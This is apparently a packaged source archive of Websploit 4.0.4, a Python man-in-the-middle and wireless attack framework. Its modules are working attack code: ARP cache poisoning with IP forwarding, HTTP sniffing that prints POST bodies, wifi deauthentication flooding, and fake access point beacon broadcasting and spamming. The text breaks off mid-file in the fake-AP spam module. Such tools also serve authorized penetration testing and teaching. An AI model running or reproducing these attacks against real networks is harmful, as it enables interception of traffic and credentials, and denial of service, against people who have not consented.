pax_global_header00006660000000000000000000000064136167377010014525gustar00rootroot0000000000000052 comment=2d7ce99b7457ec9c8c321117cd30555beec76477 websploit-4.0.4/000077500000000000000000000000001361673770100135425ustar00rootroot00000000000000websploit-4.0.4/LICENSE.txt000066400000000000000000000020351361673770100153650ustar00rootroot00000000000000Copyright 2017-2019 WEBSPLOIT Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.websploit-4.0.4/MANIFEST.in000066400000000000000000000000731361673770100153000ustar00rootroot00000000000000# documentation include README.md include requirements.txt websploit-4.0.4/README.md000066400000000000000000000022651361673770100150260ustar00rootroot00000000000000 **Websploit** ====

Websploit is a high level MITM framework Installation ------------ Manual install via git : ```bash $ git clone https://github.com/websploit/websploit.git $ cd websploit $ python setup.py install ``` Execute via command line : ```bash $ websploit ``` install via `apt` coming soon ... Menu -----

Select module : ```bash wsf > use arp_spoof ``` with `options` command you can see options of current module: ```bash wsf > arp_spoof > options ``` Change options with `set` command: ```bash wsf > arp_spoof > set target 192.168.1.24 ``` Finally run module via `execute` command: ```bash wsf > arp_spoof > execute ``` Meta ---- Fardin Allahverdinazhand - [\@0x0ptim0us](https://twitter.com/0x0ptim0us) - <0x0ptim0us@gmail.com> Distributed under the MIT license. see [LICENSE.txt](https://github.com/websploit/websploit/blob/master/LICENSE.txt) for more information. websploit-4.0.4/requirements.txt000066400000000000000000000000201361673770100170160ustar00rootroot00000000000000scapy requests websploit-4.0.4/setup.py000077500000000000000000000032001361673770100152520ustar00rootroot00000000000000#!/usr/bin/python3 import codecs from setuptools import setup, find_packages WEBSPLOIT_VERSION = "4.0.4" WEBSPLOIT_DOWNLOAD = ('https://github.com/websploit/websploit/tarball/' + WEBSPLOIT_VERSION) def read_file(filename): """ Read a utf8 encoded text file and return its contents. """ with codecs.open(filename, 'r', 'utf8') as f: return f.read() def read_requirements(): with open('requirements.txt') as f: return f.readlines() setup( name='websploit', packages=[ 'websploit', 'websploit.ezcolor', 'websploit.modules', 'websploit.core', 'websploit.core.base', 'websploit.core.utils'], package_data={ 'websploit.core': [ 'utils/*', ], }, version=WEBSPLOIT_VERSION, description='Websploit is a high level MITM framework', long_description=read_file('README.md'), long_description_content_type='text/markdown', # packages = find_packages(), entry_points ={ 'console_scripts': [ 'websploit = websploit.websploit:start_wsf' ] }, license='MIT', author='Fardin Allahverdinazhand', author_email='0x0ptim0us@gmail.com', url='https://github.com/websploit/websploit', download_url=WEBSPLOIT_DOWNLOAD, keywords=['python3', 'websploit', 'wsf', 'MITM', 'wifi', 'arp spoof'], classifiers=[ 'Intended Audience :: Developers', 'License :: OSI Approved :: MIT License', 'Programming Language :: Python :: 3.5', 'Programming Language :: Python :: 3.6', 'Programming Language :: Python :: 3.7', 'Programming Language :: Python :: 3.8', 'Natural Language :: English', ], install_requires= read_requirements(), ) websploit-4.0.4/websploit/000077500000000000000000000000001361673770100155525ustar00rootroot00000000000000websploit-4.0.4/websploit/__init__.py000066400000000000000000000000001361673770100176510ustar00rootroot00000000000000websploit-4.0.4/websploit/core/000077500000000000000000000000001361673770100165025ustar00rootroot00000000000000websploit-4.0.4/websploit/core/__init__.py000066400000000000000000000000001361673770100206010ustar00rootroot00000000000000websploit-4.0.4/websploit/core/base/000077500000000000000000000000001361673770100174145ustar00rootroot00000000000000websploit-4.0.4/websploit/core/base/Base.py000066400000000000000000000032261361673770100206430ustar00rootroot00000000000000import cmd import sys from websploit.modules import all_modules, module_list from websploit.core.utils import CPrint completions = [ 'target', 'ip', 'gateway', 'mac', 'iface', 'gateway_mac', 'target_mac' ] class Module(cmd.Cmd): parameters = {} cp = CPrint() def do_execute(self): """Execute current module""" pass def do_back(self, *args): """go back one level""" return True def do_exit(self, line): """exit websploit""" sys.exit(0) def do_set(self, line): """set options""" try: key, value = line.split(' ') print(key, value) self.parameters.update({key: value}) except KeyError: # print(f"*** Unknown Option! option not has value!") self.cp.warning(text="*** Unknown Option! option not has value!") except ValueError: # print(f"*** Option not has value!") # print(f"*** Example : set host 127.0.0.1") self.cp.warning(text="*** Option not has value!") self.cp.info(text="*** Example : set host 127.0.0.1") def do_options(self, line): """Show options of current module""" print("\n") self.cp.green(f"{'Option':20}\t{'Value':20}") self.cp.green(f"{'--'*8:<20}\t{'--'*8:<20}") for k,v in self.parameters.items(): self.cp.yellow(f"{k:20}\t{v:20}") print("\n") def complete_set(self, text, line, begidx, endidx): mline = line.partition(' ')[2] offs = len(mline) - len(text) return [s[offs:] for s in self.completions if s.startswith(mline)] websploit-4.0.4/websploit/core/base/__init__.py000066400000000000000000000000301361673770100215160ustar00rootroot00000000000000from .Base import Modulewebsploit-4.0.4/websploit/core/utils/000077500000000000000000000000001361673770100176425ustar00rootroot00000000000000websploit-4.0.4/websploit/core/utils/__init__.py000066400000000000000000000002411361673770100217500ustar00rootroot00000000000000from .tools import * from .tui import logo from .startup import check_dependencies from .output import CPrint from .about import about from .update import updatewebsploit-4.0.4/websploit/core/utils/about.py000066400000000000000000000010541361673770100213260ustar00rootroot00000000000000import platform def about(): s_color = "\033[92m" if platform.system() != "Windows" else "" e_color = "\033[0m" if platform.system() != "Windows" else "" about = f"""{s_color} Websploit Framework Author : Fardin Allahverdinazhand Contact : 0x0ptim0us[~A~]Gmail.Com Twitter : @0x0ptim0us Codename : Reborn Project Github : https://github.com/websploit/websploit Other Projects : https://github.com/0x0ptim0us {e_color}""" print(about)websploit-4.0.4/websploit/core/utils/fake_mac000066400000000000000000000070171361673770100213200ustar00rootroot00000000000000D1:CA:A5:0D:E1:33 61:8A:37:1B:C5:D3 0E:DD:90:26:1E:0B 40:82:2B:58:CE:2F 53:A1:97:49:52:6E 29:43:75:EB:57:D7 23:0F:12:E6:69:7F 0B:86:DE:4F:79:2F E1:A3:88:BA:BB:9C D8:23:19:21:4A:72 9C:10:54:F3:5A:6D 21:7D:C1:9A:9B:DA 40:B8:A3:A3:FC:44 03:75:DD:2F:F9:CB A5:53:03:D4:39:DD C7:1B:35:F3:86:86 3A:52:42:EE:73:28 6F:C9:89:74:18:F4 DE:85:40:B8:B1:AF 38:DA:CF:22:FF:C7 83:C9:BB:E8:A6:DE 69:61:A1:0D:9E:75 DA:8C:94:41:70:B2 B9:A5:F7:45:0A:7A B7:75:5F:A3:92:F2 63:3D:3E:FF:79:46 18:C1:33:CE:A3:30 2E:3B:02:D7:61:49 F4:87:DD:DE:59:08 CC:77:FA:72:8A:D9 CB:02:C4:CB:84:26 10:47:94:F6:06:D0 14:29:EF:2A:A2:D6 79:2F:D4:5F:4A:6E E5:4F:C1:FD:51:63 09:DB:BA:12:33:21 87:0C:16:A0:BE:F7 FE:44:FB:7F:45:AF FC:23:F4:47:B4:4D AE:D5:DC:DC:A1:19 C8:80:D3:0D:F2:0E 64:61:8A:E2:8B:75 74:21:63:A2:B3:39 63:65:56:3B:A9:C2 3B:4C:6B:1E:03:F6 6A:82:DB:B3:E1:83 7B:E1:5B:38:67:4C 26:A2:9A:80:41:21 CD:4B:EC:E5:7D:6C 89:5E:09:A2:F5:59 FD:93:EB:4B:88:66 44:BB:11:89:AD:7A 62:C6:71:F6:F8:9D 3D:8B:5E:19:3C:44 DC:E7:95:10:7D:6E F5:4E:DD:B0:A4:BF 2C:85:8D:A5:98:C3 DD:35:A9:39:E8:7B 53:B0:76:F9:28:FA 59:FE:1B:1E:84:32 D7:CB:F3:64:61:4D 74:79:C6:31:F2:F0 D1:E5:52:83:94:E8 75:CE:61:BE:52:71 8B:27:D1:7B:26:08 88:B1:C9:94:E5:25 6D:3B:0A:C8:5E:03 07:E2:DE:A5:75:63 FF:7D:59:2B:75:77 03:F5:2F:82:76:44 5F:AC:40:F3:07:15 03:07:97:E9:BE:ED D7:F4:D3:92:23:E7 3E:A3:5B:85:F9:D8 0B:1B:9F:87:67:B4 B4:6D:75:4B:3F:E8 A7:D9:0A:10:62:CF 24:68:C2:C7:63:4E 89:9B:87:32:E0:CE BD:F1:0B:02:F7:AB 97:2F:A7:D2:06:D8 E0:AC:06:BB:4A:C4 5D:64:40:0D:72:C1 9A:39:00:1E:0C:B1 26:C6:09:A5:60:9A 19:78:C3:A5:DD:FE E0:CE:C7:FF:DC:5D 50:2B:0C:51:5C:A1 F4:7D:16:BF:67:E3 FD:2C:97:AE:7C:98 8E:9E:A3:FA:76:79 C2:83:96:68:48:5D FF:C7:B5:F4:48:2E C1:83:8F:C4:15:7B BD:3F:58:D5:79:C3 EB:72:39:1F:A9:32 9F:7A:4E:50:C9:F1 1C:69:52:C4:D3:61 C7:06:13:9A:30:47 EA:7A:37:C4:32:D9 59:D2:C3:38:B4:FC 78:6A:8A:26:49:17 0D:C4:F9:D4:3A:7F DA:88:E7:46:FA:07 52:D9:CE:1C:BD:0B 6D:F9:76:95:11:DF 82:57:C6:E1:8B:B4 AC:15:91:0F:F0:96 62:B7:39:7B:BC:27 20:9B:B4:F5:00:B9 2B:81:B1:72:33:96 C0:17:D3:EF:37:AF BA:4B:AF:4C:BD:D6 E5:82:82:84:2A:BF D9:F1:19:0C:34:8E 4C:AF:98:58:DE:A5 02:92:C4:2A:D1:BE AB:BE:F3:C3:F6:29 E8:1B:6B:06:D9:8A DA:4B:BF:96:A4:49 70:D7:6F:05:71:0D C1:39:AC:38:67:32 6C:80:1C:A8:C7:F2 6F:7E:08:BC:9F:63 B9:B1:1E:37:BB:8C 72:43:94:6F:3D:D4 59:0E:86:23:0D:41 C8:87:30:3B:27:EB B4:BF:28:37:13:69 A8:CA:51:B1:93:8C 4B:76:36:2E:AD:DC 50:47:4A:0E:2D:87 E3:97:61:3A:DB:10 13:EB:0C:85:CC:C0 6D:E8:A6:F8:98:F0 A2:A7:DB:7E:E5:AE 12:4E:E0:E4:DD:C7 3B:FD:4E:DE:17:5E 3C:D1:17:03:94:17 4F:B2:C7:90:29:D6 7A:48:19:74:54:67 B6:A4:AB:BE:A6:07 DA:7F:34:6A:EA:3F 4A:49:EA:09:0A:DA 58:80:E9:7B:3E:A6 20:00:B3:FF:D3:8B D9:4D:31:79:90:97 90:2C:ED:20:D2:08 6F:73:30:F0:93:EC 55:5E:5E:6E:E8:AC 5C:C3:FC:B5:C3:8F 37:FC:BD:80:3E:E8 C4:7B:D1:72:E4:5D 01:2C:4A:B7:2B:3D 8B:DB:9B:46:0B:1D C8:FA:C5:7D:69:9A 45:16:04:38:F0:49 B8:FB:30:8F:88:A5 D1:23:BB:DF:0E:50 28:91:8D:A3:59:F8 97:72:F1:7C:39:FE 4C:D5:A2:5C:AE:E2 B8:50:24:8B:C0:DB 14:84:D7:22:4F:7E 1C:BB:B9:D6:13:73 7F:F3:FC:F1:17:5E E8:02:77:19:4C:4F 52:56:5C:AC:C9:0B 5F:C6:62:54:A5:71 D8:A1:4F:09:15:F6 29:2E:22:98:16:E7 83:C2:93:36:BE:7F D7:8E:C7:4E:16:C3 96:BA:CA:24:DE:66 19:CC:73:B4:A3:27 A6:5B:D2:F6:8A:04 42:82:0E:81:75:DF 88:33:B6:A6:CF:19 10:F9:B0:DF:25:13 3A:4B:F2:A7:AD:A6 34:C0:4D:95:E9:F9 9C:8B:2A:E5:43:03 5A:AF:85:5B:91:BD F5:3D:E2:67:EE:20 81:6C:46:F9:1A:89 FE:48:F0:6E:59:B3 B1:A9:0C:A8:D0:51 64:A7:E3:0D:15:60 5C:FA:5A:D0:C7:9C 33:41:39:2A:ED:1C 02:A1:70:1C:C0:61 B3:17:AA:3D:E7:E1 11:BF:ED:BE:F5:F6 50:21:18:2C:B3:35 E6:2C:D1:DE:29:D0 69:E5:ED:B4:DD:5E 58:A0:BD:59:37:51 83:FA:CD:A2:68:74 52:83:FE:14:6C:41 99:BD:00:E9:3D:3Fwebsploit-4.0.4/websploit/core/utils/fake_names000066400000000000000000000026501361673770100216610ustar00rootroot00000000000000Karima   Leilani   Jeffrey   Lane   Ute   Cherly   Dorthy   Svetlana   Porter   Elsy   Rachal   Rosa   Hannah   Jenine   Mirta   Consuelo   Mariam   Jeraldine   Malorie   Dorine   Eliana   Muriel   Jami   Thu   Kirsten   Tom   Frida   Micheline   Ceola   Janelle   Marta   Arica   Bobbi   Thuy   Levi   Bobette   Devorah   Xenia   Caterina   Tracy   Milo   Sabina   Stephnie   Devon   Mitzi   Lauran   Agnes   Hermila   Joetta   Marylynn   Myrtle   Deetta   Shena   Gracia   Xenia   Cecelia   Moon   Sang   Sabrina   Abbie   Allie   Ardath   Tory   Keren   Adell   Milo   Monika   Alvina   Armando   Rachele   Belkis   Nathalie   Clyde   Angella   Brynn   Zachery   Marisha   Halley   Tenesha   Breanna   Glen   Doyle   Ruben   Rob   Cinthia   Bennie   India   Dori   Tula   Enda   Machelle   Julienne   Jerrell   Chantel   Ivory   Tran   Sueann   Janee   Yi Vanessa Brande   Fermina   Tanna   Rashad   Ceola   Ricardo   Nieves   Granville   Randi   Harlan   Paulette   Asa   Russel   Freddy   Denna   Rodney   Kathaleen   Kathrine   Vito   Spring   Elli   Violet   Luciano   Jackie   Alayna   Teri   Michelina   Delorse   Janeth   Sigrid   Fidelia   Lien   Donya   Davina   Kum   Ardella   Alton   Shenna   Dana   Lenny   Maryanna   Freeda   Chet   Flo   Ethel   Mikel   Maxwell   Artie   Tai   Dianewebsploit-4.0.4/websploit/core/utils/output.py000066400000000000000000000041111361673770100215510ustar00rootroot00000000000000from websploit.ezcolor import Style import platform class Output: def __init__(self): self._os = platform.system() self._style = Style() self._color_status = True if self._os == "Windows": self._color_status = False def _output(self, text, status): symbols = { "success": "[+]", "warning": "[!]", "error": "[-]", "info": "[>]" } if self._color_status: if status == "success": cp = self._style.add.foreground('green').prefix('done').bold.apply() cp(text) elif status == "warning": cp = self._style.add.foreground('yellow').prefix('warning').bold.apply() cp(text) elif status == "error": cp = self._style.add.foreground('red').prefix('error').bold.apply() cp(text) elif status == "info": cp = self._style.add.foreground('cyan').prefix('info').bold.apply() cp(text) elif status == "green": cp = self._style.add.foreground('green').apply() cp(text) elif status == "red": cp = self._style.add.foreground('red').apply() cp(text) elif status == "yellow": cp = self._style.add.foreground('yellow').apply() cp(text) else: print(f"{symbols[status]} {text}") class CPrint(Output): def __init__(self): super().__init__() def success(self, text): self._output(text=text, status="success") def warning(self, text): self._output(text=text, status="warning") def error(self, text): self._output(text=text, status="error") def info(self, text): self._output(text=text, status="info") def green(self, text): self._output(text=text, status="green") def red(self, text): self._output(text=text, status="red") def yellow(self, text): self._output(text=text, status="yellow") websploit-4.0.4/websploit/core/utils/startup.py000066400000000000000000000014141361673770100217160ustar00rootroot00000000000000import platform import importlib.util import sys def check_dependencies(): """Check system befor starting core""" modules = [ 'scapy', 'requests' ] not_installed_modules = [] for module in modules: spec = importlib.util.find_spec(module) if spec is None: print(f"[-] WARNING : `{module}` library not installed.") not_installed_modules.append(module) if not_installed_modules: install_string = "" for module in not_installed_modules: install_string += f"{module} " install_command = f"python3 -m pip install {install_string}" print("[+] Use below command for installing missing libraries.") print(f"[+] {install_command}") sys.exit() websploit-4.0.4/websploit/core/utils/tools.py000066400000000000000000000023501361673770100213540ustar00rootroot00000000000000from scapy.all import * import random def get_mac(ip): """Get user MAC address""" ans, _ = srp(Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(pdst=ip), timeout=3, verbose=0) if ans: return ans[0][1].src else: return None def enable_ip_forward(): """Enable ip forwarding on linux machine""" file_path = "/proc/sys/net/ipv4/ip_forward" try: with open(file_path) as file: if file.read() == 1: return True with open(file_path, "w") as file: print(1, file=file) return True except Exception: return False def get_fake_mac(): file_path = os.path.join(os.path.dirname(__file__), 'fake_mac') with open(file_path) as file: mac_list = file.readlines() random_mac = random.choice(mac_list) random_mac = random_mac.strip("\n") random_mac = random_mac.strip() return random_mac def get_fake_name(): file_path = os.path.join(os.path.dirname(__file__), 'fake_names') with open(file_path) as file: name_list = file.readlines() random_name = random.choice(name_list) random_name = random_name.strip("\n") random_name = random_name.strip() return random_name websploit-4.0.4/websploit/core/utils/tui.py000066400000000000000000000007521361673770100210210ustar00rootroot00000000000000from .version import version def logo(): return f"""\033[92m ____ __ ____ \ \ / \ / / | \033[95m Welcome to Websploit \033[92m \ \/ \/ / | \033[95m Version : {version} \033[92m \ / | \033[95m https://github.com/websploit/websploit \033[92m \ /\ / | \033[95m Author : Fardin Allahverdinazhand \033[92m \__/ \__/ | \033[95m Codename : Reborn \033[92m \033[0m """ websploit-4.0.4/websploit/core/utils/update.py000066400000000000000000000020361361673770100214770ustar00rootroot00000000000000import requests from .version import version from .output import CPrint def update(where): cp = CPrint() try: res = requests.get("https://api.github.com/repos/websploit/websploit/releases/latest", timeout=2) if res.status_code == 200: response = res.json() git_version = response['tag_name'] # check for new version if version != git_version: cp.success(text=f"New version available: {git_version}") cp.info(text=f"Download Link : https://api.github.com/repos/websploit/websploit/zipball/{git_version}") else: if where == "update_command": cp.success(text="You are using the latest version of websploit.") elif where == "main_menu": pass else: if where == "main_menu": pass elif where == "update_command": cp.warning("Error while updating! Check your internet connection!") except: pass websploit-4.0.4/websploit/core/utils/version.py000066400000000000000000000000211361673770100216720ustar00rootroot00000000000000version = "4.0.4"websploit-4.0.4/websploit/ezcolor/000077500000000000000000000000001361673770100172275ustar00rootroot00000000000000websploit-4.0.4/websploit/ezcolor/__init__.py000066400000000000000000000073221361673770100213440ustar00rootroot00000000000000from copy import deepcopy # Ezcolor library for python # __version__ = 0.7 # Template builder class _CPrint: def __init__(self): self.foreground = 39 self.background = 49 self.bold = None self.italic = None self.underline = None self.prefix = None def __call__(self, text): print(self.__prepare_str(text=text)) def code(self, text): return self.__prepare_str(text=text) def __prepare_str(self, text): template = self.__pattern_generator() template = template.replace("%TEXT%", text) return template def decorate(self, func): def wrapper(*args, **kwargs): result = func(*args, **kwargs) if isinstance(result, str): template = self.__prepare_str(text=result) return template else: return result return wrapper def __str__(self): return f"" def __pattern_generator(self): # template = "\033[%BOLD%;%ITALIC%;%UNDERLINE%;%BG%;%FG%m%TEXT%\033[0m" start_template = "\033[" end_template = "m%TEXT%\033[0m" # add italic if self.italic: start_template = f"{start_template}{self.italic};" # add underline if self.underline: start_template = f"{start_template}{self.underline};" # add bold if self.bold: start_template = f"{start_template}{self.bold};" # add background start_template = f"{start_template}{self.background};" # add foreground start_template = f"{start_template}{self.foreground}" if self.prefix: return self.prefix + start_template + end_template else: return start_template + end_template class Style: def __init__(self, style=_CPrint()): self.style = style @property def add(self): return _MakeStyle(style=deepcopy(self.style)) def apply(self): """return created style object""" return self.style class _MakeStyle(Style): def __init__(self, style): super().__init__(style) def foreground(self, color): colors = { 'default': 39, 'black': 30, 'red': 31, 'green': 32, 'yellow': 33, 'blue': 34, 'magenta': 35, 'cyan': 36, 'light_gray': 37, 'dark_gray': 90, 'light_red': 91, 'light_green': 92, 'light_yellow': 93, 'light_blue': 94, 'light_magenta': 95, 'light_cyan': 96, 'white': 97} try: self.style.foreground = colors[color] except KeyError: print(f"{color} color not supported for foreground! try supported colors :") print("\n") for c in colors.keys(): print(c, end=",") print("\n") return self def background(self, color): colors = { 'default': 49, 'black': 40, 'red': 41, 'green': 42, 'yellow': 43, 'blue': 44, 'magenta': 45, 'cyan': 46, 'light_gray': 47, 'dark_gray': 100, 'light_red': 101, 'light_green': 102, 'light_yellow': 103, 'light_blue': 104, 'light_magenta': 105, 'light_cyan': 106, 'white': 107} try: self.style.background = colors[color] except KeyError: print(f"{color} color not supported for background! try supported colors :") print("\n") for c in colors.keys(): print(c, end=",") print("\n") return self def prefix(self, type_): prefix = { "done": "\033[32;m[✔] \033[0m", "error": "\033[31;m[✘] \033[0m", "warning": "\033[33;m[→] \033[0m", "info": "\033[34;m[𝓲] \033[0m" } try: self.style.prefix = prefix[type_] except KeyError: print(f"{type_} prefix not supported! list of supported items :") print("\n") for c in prefix.keys(): print(c, end=",") print("\n") return self @property def underline(self): self.style.underline = 4 return self @property def italic(self): self.style.italic = 3 return self @property def bold(self): self.style.bold = 1 return self websploit-4.0.4/websploit/modules/000077500000000000000000000000001361673770100172225ustar00rootroot00000000000000websploit-4.0.4/websploit/modules/__init__.py000066400000000000000000000012041361673770100213300ustar00rootroot00000000000000import os import pkgutil from websploit.core.utils import CPrint cp = CPrint() __all__ = list(module for _, module, _ in pkgutil.iter_modules([os.path.dirname(__file__)])) def all_modules(): """print available modules in nice way""" cp.green(f"{'Modules':<20}\t{'Description':<20}") cp.green(f"{'--'*10}\t{'--'*13}") for module in __all__: try: current_module = globals()[module].Main() cp.yellow(f"{module:<20}\t{current_module.__doc__}") except AttributeError: print(f"*** Module `{module}` not has `Main` class!") print("\n") def module_list(): return __all__ websploit-4.0.4/websploit/modules/arp_spoof.py000077500000000000000000000034621361673770100215740ustar00rootroot00000000000000from scapy.all import * from websploit.core.utils import get_mac, enable_ip_forward from time import sleep from websploit.core import base conf.verb = 0 class Main(base.Module): """ARP Cache poisoning""" parameters = { "target": "192.168.1.240", "gateway": "192.168.1.24" } completions = list(parameters.keys()) def do_execute(self, line): """Execute current module""" enable_ip_forward() while True: try: # Start spoof self._spoof(target=self.parameters['target'], getway=self.parameters['gateway']) self._spoof(target=self.parameters['gateway'], getway=self.parameters['target']) sleep(0.2) except KeyboardInterrupt: # Restore self._restore(target=self.parameters['target'], getway=self.parameters['gateway']) self._restore(target=self.parameters['gateway'], getway=self.parameters['target']) break def _spoof(self, target, getway): target_mac = get_mac(ip=target) arp_response = ARP(pdst=target, hwdst=target_mac, psrc=getway, op='is-at') # get the MAC address self_mac = ARP().hwsrc # send the packet send(arp_response) self.cp.success(f"Sent to {target} : {getway} MAC {self_mac}") def _restore(self, target, getway): self.cp.warning(f"Stoping arp spoofing ...") target_mac = get_mac(ip=target) arp_response = ARP(pdst=target, hwdst=target_mac, psrc=getway, op='is-at') send(arp_response, verbose=0, count=7) def complete_set(self, text, line, begidx, endidx): mline = line.partition(' ')[2] offs = len(mline) - len(text) return [s[offs:] for s in self.completions if s.startswith(mline)] websploit-4.0.4/websploit/modules/http_sniffer.py000077500000000000000000000021141361673770100222700ustar00rootroot00000000000000import cmd from scapy.all import * from scapy.layers.http import HTTPRequest from websploit.core import base conf.verb = 0 class Main(base.Module): """Sniff HTTP traffic""" parameters = {"iface": "eth0"} completions = list(parameters.keys()) def packet_handler(self, packet): if packet.haslayer(HTTPRequest): url = packet[HTTPRequest].Host.decode() + packet[HTTPRequest].Path.decode() ip = packet[IP].src method = packet[HTTPRequest].Method.decode() self.cp.success(text=f"[+] {ip} Requested {url} with {method}") if packet.haslayer(Raw) and method == "POST": self.cp.info(text=f"[+] Raw data: {packet[Raw].load}") def do_execute(self, line): """Execute current module""" sniff(filter="port 80", prn=self.packet_handler, iface=self.parameters['iface'], store=False) def complete_set(self, text, line, begidx, endidx): mline = line.partition(' ')[2] offs = len(mline) - len(text) return [s[offs:] for s in self.completions if s.startswith(mline)] websploit-4.0.4/websploit/modules/scan_network.py000077500000000000000000000016431361673770100223000ustar00rootroot00000000000000from scapy.all import * from websploit.core import base conf.verb = 0 class Main(base.Module): """Scan IP range for new devices """ parameters = { "ip": "192.168.1.1/24" } completions = list(parameters.keys()) def do_execute(self, line): """Execute current module""" # create arp packet arp = ARP(pdst=self.parameters['ip']) # set mac address for broadcasting ether = Ether(dst="ff:ff:ff:ff:ff:ff") # stack them packet = ether/arp result = srp(packet, timeout=5)[0] self.cp.green(f"{'IP':<16}\t {'MAC':^15}") for _, received in result: self.cp.yellow(f"{received.psrc:<20} {received.hwsrc:^18}") def complete_set(self, text, line, begidx, endidx): mline = line.partition(' ')[2] offs = len(mline) - len(text) return [s[offs:] for s in self.completions if s.startswith(mline)] websploit-4.0.4/websploit/modules/scan_wifi.py000066400000000000000000000035231361673770100215410ustar00rootroot00000000000000from scapy.all import * from websploit.core import base import subprocess conf.verb = 0 class Main(base.Module): """Scan Wireless devices """ parameters = { "iface": "wlan0" } completions = list(parameters.keys()) def do_execute(self, line): """Execute current module""" try: self.cp.green(f"{'SSID':<30}\t{'BSSID':^18}\t{'CHANNEL':^9}\t{'SIGNAL':^9}\t{'BARS':^8}\t{'SECURITY':^18}") result = self.scan() if result: for wifi in result: self.cp.yellow(f"{wifi['SSID']:<30}\t {wifi['BSSID']:^18}\t {wifi['CHANNEL']:^9}\t {wifi['SIGNAL']:^9}\t {wifi['BARS']:^8}\t {wifi['SECURITY']:^18}") except Exception: self.cp.error(text=f"Error: Wireless interface {self.parameters['iface']} is busy or monitor mode enabled!") def scan(self): """Scan wifi with nmcli and parse output""" result = [] output = subprocess.run(["nmcli", "-t", "-e", "yes","-f", "ssid,bssid,chan,signal,bars,security","dev","wifi"], stdout=subprocess.PIPE).stdout.decode("utf-8") if output: # convert it to list list_output = output.split("\n") for info in list_output: # fix bssid escape char info = info.replace("\:", "-") try: info = info.split(":") result.append({"SSID":info[0], "BSSID": info[1], "CHANNEL": info[2], "SIGNAL": info[3], "BARS": info[4], "SECURITY": info[5]}) except IndexError: pass else: return None return result def complete_set(self, text, line, begidx, endidx): mline = line.partition(' ')[2] offs = len(mline) - len(text) return [s[offs:] for s in self.completions if s.startswith(mline)] websploit-4.0.4/websploit/modules/wifi_deauth.py000066400000000000000000000022511361673770100220640ustar00rootroot00000000000000from scapy.all import * from websploit.core import base conf.verb = 0 class Main(base.Module): """Force device to disconnect from WIFI - De-authentication attack """ parameters = { "target_mac": "11:11:11:11:11:11", "gateway_mac": "22:22:22:22:22:22", "iface": "wlan0mon" } completions = list(parameters.keys()) def do_execute(self, line): """Execute current module""" self.cp.success(text=f"Starting De-authentication attack on {self.parameters['target_mac']}") self.cp.info(text="Press Ctrl+C for stop...") # 802.11 frame # addr1: destination MAC # addr2: source MAC # addr3: Access Point MAC dot11 = Dot11(addr1=self.parameters['target_mac'], addr2=self.parameters['gateway_mac'], addr3=self.parameters['gateway_mac']) packet = RadioTap() / dot11 / Dot11Deauth(reason=7) sendp(packet, inter=0.1, count=1000, iface=self.parameters['iface'], verbose=1) def complete_set(self, text, line, begidx, endidx): mline = line.partition(' ')[2] offs = len(mline) - len(text) return [s[offs:] for s in self.completions if s.startswith(mline)]websploit-4.0.4/websploit/modules/wifi_fap.py000066400000000000000000000032001361673770100213530ustar00rootroot00000000000000from scapy.all import * from websploit.core import base conf.verb = 0 class Main(base.Module): """Start Fake Access point (AP) """ parameters = { "ssid": "websploit", "iface": "wlan0mon", "mac": str(RandMAC()) } completions = list(parameters.keys()) def do_execute(self, line): """Execute current module""" self.cp.success(text=f"Fake Access point started on {self.parameters['iface']}, SSID {self.parameters['ssid']} MAC {self.parameters['mac']}") self.cp.info(text="Press Ctrl+C for stop...") dot11 = Dot11(type=0, subtype=8, addr1="ff:ff:ff:ff:ff:ff", addr2=self.parameters['mac'], addr3=self.parameters['mac']) beacon = Dot11Beacon() essid = Dot11Elt(ID="SSID", info=self.parameters['ssid'], len=len(self.parameters['ssid'])) rsn = Dot11Elt(ID='RSNinfo', info=( '\x01\x00' # RSN Version 1 '\x00\x0f\xac\x02' # Group Cipher Suite : 00-0f-ac TKIP '\x02\x00' # 2 Pairwise Cipher Suites (next two lines) '\x00\x0f\xac\x04' # AES Cipher '\x00\x0f\xac\x02' # TKIP Cipher '\x01\x00' # 1 Authentication Key Managment Suite (line below) '\x00\x0f\xac\x02' # Pre-Shared Key '\x00\x00')) # RSN Capabilities (no extra capabilities) frame = RadioTap()/dot11/beacon/essid/rsn sendp(frame, inter=0.1, iface=self.parameters['iface'], loop=1) def complete_set(self, text, line, begidx, endidx): mline = line.partition(' ')[2] offs = len(mline) - len(text) return [s[offs:] for s in self.completions if s.startswith(mline)]websploit-4.0.4/websploit/modules/wifi_fap_spam.py000066400000000000000000000044531361673770100224060ustar00rootroot00000000000000from scapy.all import * from websploit.core import base from threading import Thread from websploit.core.utils import get_fake_mac, get_fake_name conf.verb = 0 class Main(base.Module): """Spamming Fake access points """ parameters = { "iface": "wlan0mon", "count": 10, } completions = list(parameters.keys()) def do_execute(self, line): """Execute current module""" process_list = [] try: for _ in range(int(self.parameters['count'])): name = get_fake_name() mac = get_fake_mac() p = Thread(target=SpawnAP, args=(name, mac, self.parameters['iface'])) process_list.append(p) p.start() self.cp.success(text=f"Access point name : {name} - MAC {mac} started.") self.cp.info("Press Ctrl+C for stop ...") input("") except KeyboardInterrupt: self.cp.warning("\nKilling all access points, please wait ...") # for p in process_list: # p.terminate() # p.join() self.cp.success("Done.") def complete_set(self, text, line, begidx, endidx): mline = line.partition(' ')[2] offs = len(mline) - len(text) return [s[offs:] for s in self.completions if s.startswith(mline)] class SpawnAP: def __init__(self, ssid, mac, iface): self.ssid = ssid self.mac = mac self.iface = iface self.run() def run(self): dot11 = Dot11(type=0, subtype=8, addr1="ff:ff:ff:ff:ff:ff", addr2=self.mac, addr3=self.mac) beacon = Dot11Beacon() essid = Dot11Elt(ID="SSID", info=self.ssid, len=len(self.ssid)) rsn = Dot11Elt(ID='RSNinfo', 